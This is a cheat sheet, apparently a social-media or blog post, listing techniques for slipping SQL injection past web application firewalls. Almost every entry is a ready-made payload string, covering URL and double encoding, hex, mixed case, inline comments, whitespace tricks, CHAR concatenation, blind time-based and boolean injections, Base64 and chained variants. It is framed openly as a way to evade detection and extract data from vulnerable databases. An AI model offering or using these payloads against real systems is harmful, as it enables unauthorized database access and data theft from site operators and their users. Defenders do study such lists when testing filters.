🔑WAF Bypass Techniques for SQL Injection

Below are various methods to bypass WAFs & execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, & manipulation strategies to evade detection.

WAF Bypass Techniques for SQL Injection

1. Using Encoding and Obfuscation

URL Encoding

• Encode parts of the payload to bypass basic keyword detection mechanisms used by WAFs.

%27%20UNION%20SELECT%20NULL,NULL,NULL--

Double URL Encoding

• Double encode the payload to evade more sophisticated detection mechanisms.

%2527%2520UNION%2520SELECT%2520NULL,NULL,NULL--

Hex Encoding

• Use hexadecimal encoding for the payload to obscure the SQL commands.

' UNION SELECT 0x61646D696E, 0x70617373776F7264 --

2. Case Manipulation and Comments

Mixed Case

• Change the case of SQL keywords to avoid case-sensitive filters.

' uNioN SeLecT NULL, NULL --

Inline Comments

• Insert comments within SQL keywords to break up recognizable patterns.

' UNION/**/SELECT/**/NULL,NULL --

3. Whitespace and Special Characters

Using Different Whitespace Characters

• Replace spaces with other whitespace characters like tabs or newlines to confuse simple string-matching filters.

' UNION%0D%0ASELECT%0D%0A NULL,NULL --

Concatenation with Special Characters

• Use special characters and concatenation functions to dynamically build the payload.

' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --

4. SQL Function and Command Obfuscation

String Concatenation

• Break strings into smaller parts and concatenate them to obscure the payload.

' UNION SELECT 'ad'||'min', 'pa'||'ss' --

Using SQL Functions

• Leverage SQL functions to manipulate and obfuscate the payload.

' UNION SELECT VERSION(), DATABASE() --

5. Time-Based and Boolean-Based Payloads

Time-Based Blind SQL Injection

• Use time delays to infer information based on the response time.

' AND IF(1=1, SLEEP(5), 0) --

Boolean-Based Blind SQL Injection

• Use conditional statements to alter the response based on true or false conditions.

' AND IF(1=1, 'A', 'B')='A' --

6. Advanced Encoding Techniques

Base64 Encoding

• Encode payloads using Base64 to bypass content filters.

' UNION SELECT FROM_BASE64('c2VsZWN0IHZlcnNpb24oKQ==') --

Custom Encoding Scripts

• Develop custom scripts to encode and decode payloads in different formats to evade detection.

7. Chaining Techniques

Combining Multiple Bypass Techniques

• Combine various techniques to create more complex and harder-to-detect payloads.

%27%20UNION/**/SELECT/**/CHAR(117)%7C%7CCHAR(115)%7C%7CCHAR(101)%7C%7CCHAR(114),%20CHAR(112)%7C%7CCHAR(97)%7C%7CCHAR(115)%7C%7CCHAR(115)%20--%0A

8. Leveraging Lesser-Known SQL Features

Using JSON Functions

• Leverage JSON functions to manipulate and extract data in a more complex manner.

' UNION SELECT json_extract(column_name, '$.key') FROM table_name --

Using XML Functions

• Utilize XML functions to construct more sophisticated payloads.

' UNION SELECT extractvalue(1, 'version()') --

These techniques highlight various methods to bypass WAFs and execute SQL injection attacks. Each technique takes advantage of different obfuscation, encoding, and manipulation strategies to evade detection and extract data from vulnerable databases.